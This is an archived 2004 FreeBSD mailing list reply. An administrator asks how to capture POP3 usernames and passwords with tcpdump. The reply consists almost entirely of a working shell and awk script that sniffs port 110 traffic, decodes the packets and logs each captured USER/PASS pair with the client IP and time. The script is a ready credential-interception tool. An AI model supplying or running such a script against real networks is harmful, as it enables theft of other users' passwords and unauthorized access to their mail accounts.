Date: Wed, 14 Apr 2004 06:10:49 +1000 (EST) From: <freebsd-lists@albury.net.au> To: John Fox <readbsd@mind.net> Cc: freebsd-isp@freebsd.org Subject: Re: tcpdump for sniffing POP3 -- methods ? Message-ID: <Pine.BSF.4.31.0404140608551.38850-100000@giroc.albury.net.au> In-Reply-To: <20040413180323.GA13554@mind.net>
next in thread | previous in thread | raw e-mail | index | archive | help
On Tue, 13 Apr 2004, John Fox wrote:
> 2) Obtain them by sniffing the POP3 traffic being sent
> to the Imail server.
>
> I think #2 is the only possibility, and I haven't made much
> use of tcpdump, so while I do know how to run it and
> specify a host to listen to, I've no idea how to isolate
> the clear-text stuff (containing the usernames and passwords)
> from all the other traffic.
>
> Any suggestions would be greatly appreciated.
I had to do this some years back, here's the rude, crude and unattractive
script I wrote then:
# cat sniff.pop.passwords
#! /bin/sh
log=sniffed.passwords.log
mailhost="mail" # Hostname of whichever host receives your incomming mail
tcpdump -lnx -s 256 dst port 110 and host $mailhost 2>/dev/null | awk '
BEGIN{ lut="123456789abcdef" }
/>/ { IP=$2; n=0; len=0; c=""; }
{
if(n==1) for(x=1; x<=4; x++) len=len*16+index(lut,substr($2,x,1));
if(++n>3 && len>20)
{
for(i=(n==4)*4+1; i<=NF; i++)
c=sprintf("%s%c%c",c,
index(lut,substr($i,1,1))*16+index(lut,substr($i,2,1)),
index(lut,substr($i,3,1))*16+index(lut,substr($i,4,1)))
if(length(c) >= len-40)
{
sub("\.[0-9]*$","",IP);
v=substr(c,6); gsub("[^a-zA-Z0-9]","",v)
if(substr(c,1,5)=="USER ") usr[IP]=v;
if(substr(c,1,5)=="PASS " && usr[IP]) {
printf("%s %-16.16s %10s - %s\n", strftime("%d-%b-%Y %H:%M:%S"), IP, usr[IP], v);
usr[IP]=""
}
}
}
}'
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.31.0404140608551.38850-100000>